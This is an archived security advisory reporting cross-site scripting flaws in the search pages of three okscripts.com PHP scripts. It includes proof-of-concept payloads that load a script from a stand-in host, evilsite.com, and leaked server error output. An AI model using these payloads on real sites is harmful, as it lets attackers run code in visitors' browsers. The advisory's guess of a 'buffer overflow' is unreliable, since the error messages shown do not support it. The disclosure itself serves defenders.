TUCoPS :: Web :: Specific Sites :: b06-2842.htm

okscripts.com - XSS Vulns
okscripts.com - XSS Vulns
okscripts.com - XSS Vulns



OkMall v1.0=0D
=0D
Homepage:=0D
http://www.okscripts.com/=0D 
=0D
Effected files:=0D
=0D
search.php=0D
=0D
XSS Vulnerabilities:=0D
=0D
The search inputbox doesn=92t properally filter using input before generating it.  Backslashes areadded but we can easily=0D
evade this. =0D
=0D
ForPoC try putting a [imgsrc=lol.jpg]in the search box.=0D
=0D
=0D
XSS vuln via URLinjection with possible buffer overflow?:=0D
=0D
http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]=0D 
=0D
The above PoC creates the error msg:=0D
=0D
Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=classical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59=0D 
=0D
Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60=0D
=0D
Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61=0D
=0D
and continuously outputs feof() and fread() error messages on the page. Buffer overflow? =0D
=0D
------------------------=0D
=0D
QuickLinks v1.1=0D
=0D
Homepage:=0D
http://www.okscripts.com/=0D 
=0D
Effected files:=0D
=0D
cat.php=0D
=0D
XSS Vulnerabilities:=0D
=0D
The search inputbox doesn=92t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(=92XSS=92)] in the search box.=0D
=0D
XSS vuln via URL injection:=0D
http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] =0D 
=0D
--------------------------------------=0D
=0D
OKArticles v1.0=0D
=0D
=0D
Homepage:=0D
http://www.okscripts.com/=0D 
=0D
Effected files:=0D
=0D
search.php=0D
=0D
XSS Vulnerabilities:=0D
=0D
The search inputbox doesn=92t properally filter using input before generating it.  Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(=92XSS=92)] in the search box.=0D
=0D
XSS vuln via URL  injection:=0D
http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] =0D 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH